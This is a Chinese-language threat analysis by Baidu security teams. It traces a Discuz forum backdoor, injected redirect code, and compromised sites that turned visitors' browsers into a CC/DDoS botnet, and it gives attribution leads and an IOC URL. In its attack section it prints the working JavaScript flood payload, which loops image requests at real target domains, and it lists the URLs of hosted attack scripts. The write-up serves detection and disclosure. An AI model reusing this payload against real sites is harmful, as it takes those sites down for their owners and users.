menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 007-papers chevron_right 0160-从异常挖掘到CC攻击地下黑客团伙.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    0160-从异常挖掘到CC攻击地下黑客团伙.md
    6.1 KB / 2021-07-17 00:01:36
        # 从异常挖掘到CC攻击地下黑客团伙
    
    Author: 百度云安全天网团队 百度安全攻防实验室 百度云安全云端防护团队
    
    0x00 异常挖掘与回溯
    ============
    
    * * *
    
    11月13日,百度云安全天网系统,通过数十TB的日志挖掘,发现了安全宝某重点客户网站上的异常行为。之后我们的分析人员跟进,发现这是一起针对安全宝某重点客户的持续攻击。最终在客户系统上放置了Web后门。
    
    该Web后门的通信如下:
    
    ```
    POST /uc_server/data/logs/20140708.php?v=1a HTTP/1.1
    Host: bbs.xxxxx.com
    Referer: http://bbs.xxxxx.com/uc_server/data/logs/20140708.php?v=1a
    User-Agent: Sogou
    Content-Length: 60
    
    ```
    
    从通信流量上看,并未触发任何报警。同时,客户的日志里也并未保存http response的数据。
    
    天网系统中的谛听模块通过对网站的访问行为进行建模,通过每个被防护的网站日志训练出这个网站特有的访问模型。包括网站参数的模型,网站访问路径的模型,网站访问session的模型。黑客这次的访问行为触发了网站访问路径模型的异常。该模型中通过每个路径访问的频度广度和路径之间的访问关系等feature,训练出针对每个网站特定的路径视图。
    
    我们在系统中对该客户的所有历史日志进行了回溯,发现该黑客在9月24日就已经对该客户展开了尝试性的攻击。
    
    通过进一步的分析,我们发现,该攻击者修改了Discuz系统的class_core.php。在该class_core.php中添加的代码如下:
    
    ![](http://drops.javaweb.org/uploads/images/862ab7e09be0d545994e12dde3f3967623d1116e.jpg)
    
    从该代码中,我们可以做出以下结论:
    
    1.  这次攻击不是小范围的针对单个站点的攻击,而是攻击了多个站点
    2.  该代码中并未指定特定的CC攻击的目标,而是通过Location统一跳转到[http://file.lbgoo.com/file_120/37/ver.php](http://file.lbgoo.com/file_120/37/ver.php),由该url指定最终的攻击目标。
    
    0x01 影响确认和攻击代码
    ==============
    
    * * *
    
    我们从CC的攻击代码中提取了以下特征fuwuqibeiheikeruqin,在现有的网页情报库中搜索,发现以下的链接地址:
    
    [http://www.eoeandroid.com/forum.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan](http://www.eoeandroid.com/forum.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan)
    
    判断eoeandroid也被这样攻击过。
    
    11月20日,[http://file.lbgoo.com/file_120/37/ver.php](http://file.lbgoo.com/file_120/37/ver.php)请求被重定向到[http://www.eoeandroid.com/forum.php?](http://www.eoeandroid.com/forum.php?),11月20日发现eoeandroid已经503了。该攻击手法被进一步确认。
    
    我们又对该代码中提及到的`php100.com`,`www.dm123.cn`和`12edu.com`进行访问。发现如下:
    
    以dm123.cn为例:
    
    ![](http://drops.javaweb.org/uploads/images/78e31803c621fae9f026369569528f7b1a76a172.jpg)
    
    显然该网站被利用来做CC攻击。
    
    同时我们针对以上网站挂CC攻击的js进行了分析,发现有三种:
    
    1.  dm123.cn中,直接在dm123网站上挂js,脚本路径如下:  
        [http://www.dm123.cn/gd.js](http://www.dm123.cn/gd.js)
    2.  php100.com中,托管在SAE上的攻击脚本,脚本路径如下:  
        [http://jsddos.sinaapp.com/ddos.js](http://jsddos.sinaapp.com/ddos.js)
    3.  12edu.com中,通过api接口动态获得要攻击的网站,更加难以定位:  
        [http://www.12edu.com/api.php?op=count&id=34380&modelid=1](http://www.12edu.com/api.php?op=count&id=34380&modelid=1)
    
    以上三种方式,从扫描器检测的角度来看,复杂度逐渐增大。第一种情况下,是直接检测本域下的js。第二种则需要检测外链js,检测量大大增大了。而第三种则是在已有的js里面没有攻击代码。攻击的代码是通过api接口动态获得的。
    
    **攻击用的js代码如下:**
    
    ```
    function imgflyygffgdsddfgd() {
    var TARGET = 'www.hanyouwang.com'
    var URI = '/index.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
    var pic = new Image()
    var rand = Math.floor(Math.random() * 1000)
    pic.src = 'http://'+TARGET+URI+rand+'=val'
    }
    setInterval(imgflyygffgdsddfgd, 0.1)
    function imgflyygffhghddfgd() {
    var TARGET = 'www.weshequ.com'
    var URI = '/Search/v-wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
    var pic = new Image()
    var rand = Math.floor(Math.random() * 1000)
    pic.src = 'http://'+TARGET+URI+rand+'=val'
    }
    setInterval(imgflyygffhghddfgd, 0.1)
    
    ```
    
    **被攻击域名**包括重要政府网站和国家级新闻媒体
    
    0x02 身份确认
    =========
    
    * * *
    
    通过域名的相似度,我们在现有的网页情报库中发现了如下域名:
    
    *   博客:[http://jsddos.blog.163.com/](http://jsddos.blog.163.com/)
    *   论坛:[http://www.jsddos.com/](http://www.jsddos.com/)
    
    在163博客上可以看到,该团队名 ddos Js团队,QQ 1551227222
    
    在网页情报库中查找该QQ,可以发现[http://www.mspycn.com/about.html](http://www.mspycn.com/about.html)
    
    看来除了卖ddos的服务,还在卖手机监听软件的服务
    
    对该域名的whois进行查询,如下:
    
    ![](http://drops.javaweb.org/uploads/images/2fcd1c01144a05c0d525d441ed744f79144b6112.jpg)
    
    从我们发现该攻击到发稿前,该黑客做了如下的事情:
    
    1.  修改了[http://file.lbgoo.com/file_120/37/ver.php](http://file.lbgoo.com/file_120/37/ver.php)的指向
    2.  Php100.com已经不再受影响
    
    0x03 后续
    =======
    
    * * *
    
    我们有理由相信,这是一个在不断进化的地下黑客团体。通过更加隐蔽的手法进行CC攻击挂马。该问题的影响范围目前我们还在进一步确认。欢迎业内同仁继续跟进分析。
    
    如果你想查看自己的网站是否受影响,有两个步骤:
    
    1.  打开网站,随机访问几个页面,查看下面是否会发起连续的对其他网站的请求
    2.  查看是否会发起请求:[http://file.lbgoo.com/file_120/37/ver.php](http://file.lbgoo.com/file_120/37/ver.php)
    
    我们从该攻击中提取了以下信息作为攻击情报或者IOC:
    
    [http://file.lbgoo.com/file_120/37/ver.php](http://file.lbgoo.com/file_120/37/ver.php)
    
    links
    file_download